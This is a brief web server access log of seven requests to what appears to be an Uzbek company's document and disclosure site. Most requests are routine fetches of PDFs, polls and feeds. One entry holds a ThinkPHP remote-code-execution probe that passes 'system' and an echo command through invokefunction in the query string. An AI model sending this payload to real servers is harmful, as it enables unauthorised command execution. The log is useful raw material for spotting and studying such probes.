34.10.180.98 - - [24/Aug/2026:22:57:59 +0500] "GET /images/polojenie/nizom-kk-2019.pdf HTTP/1.1" 200 764169 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.10.180.98 - - [24/Aug/2026:22:58:05 +0500] "GET /material-facts/421-mu-im-fakt-06-emitentning-yu-ori-bosh-aruv-organi-tomonidan-abul-ilingan-arorlar HTTP/1.1" 200 112872 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.123.149.87 - - [24/Aug/2026:23:03:37 +0500] "GET /polls/507-poll-16-03-20?print=1&tmpl=component HTTP/1.1" 200 8088 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
85.208.96.210 - - [24/Aug/2026:23:04:08 +0500] "GET /officially/ustav/633-ustav-2026-pdf HTTP/1.1" 200 37386 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
34.10.180.98 - - [24/Aug/2026:23:07:41 +0500] "GET /polls?format=feed&template=yoo_master2&type=atom HTTP/1.1" 200 11098 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
185.191.171.3 - - [24/Aug/2026:23:11:54 +0500] "GET /?function=call_user_func_array&s=%2FIndex%2Fthink%2Fapp%2Finvokefunction&start=36&vars%5B0%5D=system&vars%5B1%5D%5B0%5D=echo%20thinkphp%20 HTTP/1.1" 200 47744 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
34.30.223.149 - - [24/Aug/2026:23:21:06 +0500] "GET /officially/strategy/549-performance-bp-2021-docx HTTP/1.1" 200 37986 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
